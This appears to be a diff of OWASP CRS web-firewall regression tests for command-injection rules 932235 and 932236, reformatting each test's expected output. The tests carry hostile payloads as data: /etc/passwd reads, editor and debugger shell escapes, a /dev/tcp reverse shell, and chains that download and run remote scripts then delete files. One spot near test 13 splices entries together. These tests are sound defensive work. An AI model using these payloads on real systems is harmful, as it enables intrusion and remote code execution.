Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: | - code=cd /;cd etc;fold passwd - version: HTTP/1.0 - output: - log_contains: id "932235" - - test_title: 932235-5 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: | + code=cd /;cd etc;fold passwd + version: HTTP/1.0 + output: + log: + expect_ids: [932235] + - test_id: 5 desc: "ANQ9SN3S" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: | - code=;flock -u / whoami - version: HTTP/1.0 - output: - log_contains: id "932235" - - test_title: 932235-6 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: | + code=;flock -u / whoami + version: HTTP/1.0 + output: + log: + expect_ids: [932235] + - test_id: 6 desc: "AVI5619I" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: | - code=;cd /;cd etc;base32 passwd|base32 -d - version: HTTP/1.0 - output: - log_contains: id "932235" - - test_title: 932235-7 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: | + code=;cd /;cd etc;base32 passwd|base32 -d + version: HTTP/1.0 + output: + log: + expect_ids: [932235] + - test_id: 7 desc: "P6E0KY27" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - version: HTTP/1.0 - data: | - code=;cpulimit -l 100 -f whoami - output: - log_contains: id "932235" - - test_title: 932235-8 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + version: HTTP/1.0 + data: | + code=;cpulimit -l 100 -f whoami + output: + log: + expect_ids: [932235] + - test_id: 8 desc: "PDDUY935" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - version: HTTP/1.0 - data: | - cd /;cd etc;comm passwd passwd - output: - log_contains: id "932235" - - test_title: 932235-9 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + version: HTTP/1.0 + data: | + cd /;cd etc;comm passwd passwd + output: + log: + expect_ids: [932235] + - test_id: 9 desc: "PDDUY935 - but uppercase" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - version: HTTP/1.0 - data: | - CD /;CD ETC;COMM PASSWD PASSWD - output: - log_contains: id "932235" - - test_title: 932235-10 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + version: HTTP/1.0 + data: | + CD /;CD ETC;COMM PASSWD PASSWD + output: + log: + expect_ids: [932235] + - test_id: 10 desc: "FP with word comment" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - method: GET - port: 80 - uri: "/get?args=comment" - version: HTTP/1.0 - output: - no_log_contains: id "932235" - - test_title: 932235-11 + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + method: GET + port: 80 + uri: "/get?args=comment" + version: HTTP/1.0 + output: + log: + no_expect_ids: [932235] + - test_id: 11 desc: "FP with word performance" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - method: GET - port: 80 - uri: "/get?args=;performance" - version: HTTP/1.0 - output: - no_log_contains: id "932235" - - test_title: 932235-12 + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + method: GET + port: 80 + uri: "/get?args=;performance" + version: HTTP/1.0 + output: + log: + no_expect_ids: [932235] + - test_id: 12 desc: "Block execution of perf command with arguments" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - method: POST - port: 80 - uri: "/post" - data: "args=;perf --version" - version: HTTP/1.1 - output: - log_contains: id "932235" - - test_title: 932235-13 + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + method: POST + port: 80 + uri: "/post" + data: "args=;perf --version" + version: HTTP/1.1 + output: + log: + expect_ids: [932235] + - test_id: 13 desc: "Block evasion using here string" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - version: HTTP/1.0 - data: | - code=;`cat<<$d/tcp/51.15.142.164/777" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate, br - Accept-Language: en-us,en;q=0.5 - method: GET - port: 80 - uri: "/get?cmd=d%3D%2Fdev%26%26(sh)0%3E%24d%2Ftcp%2F51.15.142.164%2F777" - version: HTTP/1.1 - output: - log_contains: id "932236" - - test_title: 932236-4 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate, br + Accept-Language: en-us,en;q=0.5 + method: GET + port: 80 + uri: "/get?cmd=d%3D%2Fdev%26%26(sh)0%3E%24d%2Ftcp%2F51.15.142.164%2F777" + version: HTTP/1.1 + output: + log: + expect_ids: [932236] + - test_id: 4 desc: "55O5COJ5" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: | - code=;c89 -wrapper sh,-c,id . - version: HTTP/1.0 - output: - log_contains: id "932236" - - test_title: 932236-5 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: | + code=;c89 -wrapper sh,-c,id . + version: HTTP/1.0 + output: + log: + expect_ids: [932236] + - test_id: 5 desc: "55O5COJ5" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: | - code=;c89 -wrapper sh,-c,curl\ google.com . - version: HTTP/1.0 - output: - log_contains: id "932236" - - test_title: 932236-6 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: | + code=;c89 -wrapper sh,-c,curl\ google.com . + version: HTTP/1.0 + output: + log: + expect_ids: [932236] + - test_id: 6 desc: "9323HNQU - should not be detected at PL 2" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: | - code=;vi dddd +silent\\ \!whoami +wq - version: HTTP/1.0 - output: - no_log_contains: id "932236" - - test_title: 932236-7 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: | + code=;vi dddd +silent\\ \!whoami +wq + version: HTTP/1.0 + output: + log: + no_expect_ids: [932236] + - test_id: 7 desc: "9323HNQU" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: | - code=;vim dddd +silent\\ \!whoami +wq - version: HTTP/1.0 - output: - log_contains: id "932236" - - test_title: 932236-8 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: | + code=;vim dddd +silent\\ \!whoami +wq + version: HTTP/1.0 + output: + log: + expect_ids: [932236] + - test_id: 8 desc: "9323HNQU" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: | - code=;ex dddd +silent\\ \!whoami +wq - version: HTTP/1.0 - output: - log_contains: id "932236" - - test_title: 932236-9 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: | + code=;ex dddd +silent\\ \!whoami +wq + version: HTTP/1.0 + output: + log: + expect_ids: [932236] + - test_id: 9 desc: "9323HNQU - should not be detected at PL 2" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: | - code=;vi -c:\!pwd - version: HTTP/1.0 - output: - no_log_contains: id "932236" - - test_title: 932236-10 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: | + code=;vi -c:\!pwd + version: HTTP/1.0 + output: + log: + no_expect_ids: [932236] + - test_id: 10 desc: "9323HNQU" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: | - code=;vim -c:\!pwd - version: HTTP/1.0 - output: - log_contains: id "932236" - - test_title: 932236-11 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: | + code=;vim -c:\!pwd + version: HTTP/1.0 + output: + log: + expect_ids: [932236] + - test_id: 11 desc: "9323HNQU" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: | - code=;ex -c:\!pwd - version: HTTP/1.0 - output: - log_contains: id "932236" - - test_title: 932236-12 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: | + code=;ex -c:\!pwd + version: HTTP/1.0 + output: + log: + expect_ids: [932236] + - test_id: 12 desc: "ATFHUJVF" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: | - code=;gdb -nx -ex \!whoami -ex quit - version: HTTP/1.0 - output: - log_contains: id "932236" - - test_title: 932236-13 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: | + code=;gdb -nx -ex \!whoami -ex quit + version: HTTP/1.0 + output: + log: + expect_ids: [932236] + - test_id: 13 desc: "JW2SU88A" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - version: HTTP/1.0 - data: | - code=;cat /path/file.gz - output: - log_contains: id "932236" - - test_title: 932236-14 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + version: HTTP/1.0 + data: | + code=;cat /path/file.gz + output: + log: + expect_ids: [932236] + - test_id: 14 desc: "4JOGUXYQ" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - version: HTTP/1.0 - data: | - find /etc -name passwd -exec cat {} + - output: - log_contains: id "932236" - - test_title: 932236-15 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + version: HTTP/1.0 + data: | + find /etc -name passwd -exec cat {} + + output: + log: + expect_ids: [932236] + - test_id: 15 desc: "ANQ9SN3S" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - version: HTTP/1.0 - data: | - code=flock -u / whoami - output: - log_contains: id "932236" - - test_title: 932236-16 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + version: HTTP/1.0 + data: | + code=flock -u / whoami + output: + log: + expect_ids: [932236] + - test_id: 16 desc: "JW2SU88A" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - version: HTTP/1.0 - data: | - code=cat /path/file.gz - output: - log_contains: id "932236" - - test_title: 932236-17 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + version: HTTP/1.0 + data: | + code=cat /path/file.gz + output: + log: + expect_ids: [932236] + - test_id: 17 desc: "P6E0KY27" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - version: HTTP/1.0 - data: | - code=cpulimit -l 100 -f whoami - output: - log_contains: id "932236" - - test_title: 932236-18 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + version: HTTP/1.0 + data: | + code=cpulimit -l 100 -f whoami + output: + log: + expect_ids: [932236] + - test_id: 18 desc: "FP agains 'fi' without word boundary" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - method: GET - port: 80 - uri: "/get?field_metatags[0][advanced][rights]=somevalue" - version: HTTP/1.0 - output: - no_log_contains: id "932236" - - test_title: 932236-19 + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + method: GET + port: 80 + uri: "/get?field_metatags[0][advanced][rights]=somevalue" + version: HTTP/1.0 + output: + log: + no_expect_ids: [932236] + - test_id: 19 desc: "FP MailerUI" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - method: GET - port: 80 - uri: "/get?args=MailerUI" - version: HTTP/1.0 - output: - no_log_contains: id "932236" - - test_title: 932236-20 + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + method: GET + port: 80 + uri: "/get?args=MailerUI" + version: HTTP/1.0 + output: + log: + no_expect_ids: [932236] + - test_id: 20 desc: "FP tasksListView" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - method: GET - port: 80 - uri: "/get?args=tasksListView" - version: HTTP/1.0 - output: - no_log_contains: id "932236" - - test_title: 932236-21 + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + method: GET + port: 80 + uri: "/get?args=tasksListView" + version: HTTP/1.0 + output: + log: + no_expect_ids: [932236] + - test_id: 21 desc: System Command Injection (932236) from old modsec regressions stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Host: localhost - Keep-Alive: '300' - Proxy-Connection: keep-alive - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=system('echo%20cd%20/tmp;wget%20http://turbatu.altervista.org/apache_32.png%20-O%20p2.txt;curl%20-O%20http://turbatu.altervista.org/apache_32.png;%20mv%20apache_32.png%20p.txt;lyxn%20-DUMP%20http://turbatu.altervista.org/apache_32.png%20>p3.txt;perl%20p.txt;%20perl%20p2.txt;perl%20p3.txt;rm%20-rf" - version: HTTP/1.1 - output: - log_contains: id "932236" - - test_title: 932236-22 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Host: localhost + Keep-Alive: '300' + Proxy-Connection: keep-alive + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=system('echo%20cd%20/tmp;wget%20http://turbatu.altervista.org/apache_32.png%20-O%20p2.txt;curl%20-O%20http://turbatu.altervista.org/apache_32.png;%20mv%20apache_32.png%20p.txt;lyxn%20-DUMP%20http://turbatu.altervista.org/apache_32.png%20>p3.txt;perl%20p.txt;%20perl%20p2.txt;perl%20p3.txt;rm%20-rf" + version: HTTP/1.1 + output: + log: + expect_ids: [932236] + - test_id: 22 desc: System Command Injection (932236) from old modsec regressions stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Host: localhost - Keep-Alive: '300' - Proxy-Connection: keep-alive - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=http://ricky.ilmerlodellarocca.com/upload.php;lwp-download%20http://shinnongclinic.com/kor_board/icon/member_image_box/1/appa.jpg;wget%20http://shinnongclinic.com/kor_board/icon/member_image_box/1/appa.jpg;curl%20-O%20http://shinnongclinic.com/kor_board/icon/member_image_box/1/appa.jpg;%20appa.jpg;perl%20appa.jpg;rm%20-rf%20appa.jpg;wget%20http://shinnongclinic.com/kor_board/icon/member_image_box/1/ca.txt%20ca.php;curl%20-O%20http://shinnongclinic.com/kor_board/icon/member_image_box/1/ca.txt%20ca.php;lwp-download%20http://shinnongclinic.com/kor_board/icon/member_image_box/1/ca.txt%20ca.php;mv%20ca.php%20ca.php;chmod%20755%20ca.php" - version: HTTP/1.1 - output: - log_contains: id "932236" - - test_title: 932236-23 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Host: localhost + Keep-Alive: '300' + Proxy-Connection: keep-alive + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=http://ricky.ilmerlodellarocca.com/upload.php;lwp-download%20http://shinnongclinic.com/kor_board/icon/member_image_box/1/appa.jpg;wget%20http://shinnongclinic.com/kor_board/icon/member_image_box/1/appa.jpg;curl%20-O%20http://shinnongclinic.com/kor_board/icon/member_image_box/1/appa.jpg;%20appa.jpg;perl%20appa.jpg;rm%20-rf%20appa.jpg;wget%20http://shinnongclinic.com/kor_board/icon/member_image_box/1/ca.txt%20ca.php;curl%20-O%20http://shinnongclinic.com/kor_board/icon/member_image_box/1/ca.txt%20ca.php;lwp-download%20http://shinnongclinic.com/kor_board/icon/member_image_box/1/ca.txt%20ca.php;mv%20ca.php%20ca.php;chmod%20755%20ca.php" + version: HTTP/1.1 + output: + log: + expect_ids: [932236] + - test_id: 23 desc: arg value of ";ifconfig Something „The Title”. After space or new line more characters" is blocked stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate, br - Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 - Content-Type: application/x-www-form-urlencoded - method: POST - port: 80 - uri: "/post" - data: "arg=;top+Something+else+1+%26%238222%3BThe+Title%26%238221%3B.+After+space+or+new+line+more+characters" - version: HTTP/1.1 - output: - log_contains: id "932236" - - test_title: 932236-24 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate, br + Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 + Content-Type: application/x-www-form-urlencoded + method: POST + port: 80 + uri: "/post" + data: "arg=;top+Something+else+1+%26%238222%3BThe+Title%26%238221%3B.+After+space+or+new+line+more+characters" + version: HTTP/1.1 + output: + log: + expect_ids: [932236] + - test_id: 24 desc: arg value of "Something „The Title”. After ;ifconfig something" is blocked stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate, br - Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 - Content-Type: application/x-www-form-urlencoded - method: POST - port: 80 - uri: "/post" - data: "arg=Something+else+2+%26%238222%3BThe+Title%26%238221%3B.+After+%3Btop+something" - version: HTTP/1.1 - output: - log_contains: id "932236" - - test_title: 932236-25 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate, br + Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 + Content-Type: application/x-www-form-urlencoded + method: POST + port: 80 + uri: "/post" + data: "arg=Something+else+2+%26%238222%3BThe+Title%26%238221%3B.+After+%3Btop+something" + version: HTTP/1.1 + output: + log: + expect_ids: [932236] + - test_id: 25 desc: Positive test - RCE passed in one of the args stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate, br - Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 - Content-Type: application/x-www-form-urlencoded - method: POST - port: 80 - uri: "/post" - data: | - arg1=Something+else+2+%26%238222%3BThe+Title%26%238221%3B.+After+something&arg2=system('dig%20cd%20/tmp;ftp%20http://turbatu.altervista.org/apache_32.png%20-O%20p2.txt;zip%20-O%20http://turbatu.altervista.org/apache_32.png;%20mv%20apache_32.png%20p.txt;tex%20-DUMP%20http://turbatu.altervista.org/apache_32.png%20>p3.txt;cut%20p.txt;%20perl%20p2.txt;perl%20p3.txt;rm%20-rf - version: HTTP/1.1 - output: - log_contains: id "932236" - - test_title: 932236-26 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate, br + Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 + Content-Type: application/x-www-form-urlencoded + method: POST + port: 80 + uri: "/post" + data: | + 